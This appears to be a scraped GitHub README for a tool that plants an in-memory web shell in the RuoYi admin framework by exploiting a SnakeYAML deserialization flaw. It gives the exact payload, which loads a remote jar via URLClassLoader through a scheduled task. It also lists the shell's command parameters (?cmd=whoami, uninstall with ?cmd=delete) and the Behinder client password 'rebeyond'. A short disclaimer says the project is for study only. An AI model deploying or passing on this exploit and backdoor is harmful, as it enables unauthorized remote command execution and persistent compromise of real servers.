code-scan/yaml-payload-for-ruoyi: A memory shell for ruoyi
2021-12-18 00:14:38 Author: github.com(查看原文) 阅读量:301 收藏

This branch is up to date with main.

Contribute
  • This branch is not ahead of the upstream main.

    No new commits yet. Enjoy your day!

Files

Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

注入方法:
把jar放到系统可以访问的地方,在定时任务创建新的定时任务,再立即执行一次即可

org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["you_url_of_jar"]]]]')

image-20211127160033485

若依 snakeyaml 反序列化漏洞注入内存马

RuoYi

  1. 直接执行命令:?cmd=whoami
  2. 连接冰蝎:/login?cmd=1(cmd不为空即可),密码为rebeyond,使用冰蝎正常连接即可
  3. 卸载内存马:?cmd=delete

image RuoYi Vue

  1. 直接执行命令:/dev-api/?cmd=whoami
  2. 连接冰蝎:暂不支持
  3. 卸载内存马:/dev-api/?cmd=delete

项目仅供学习使用,任何未授权检测造成的直接或者间接的后果及损失,均由使用者本人负责


文章来源: https://github.com/code-scan/yaml-payload-for-ruoyi
如有侵权请联系:admin#unsafe.sh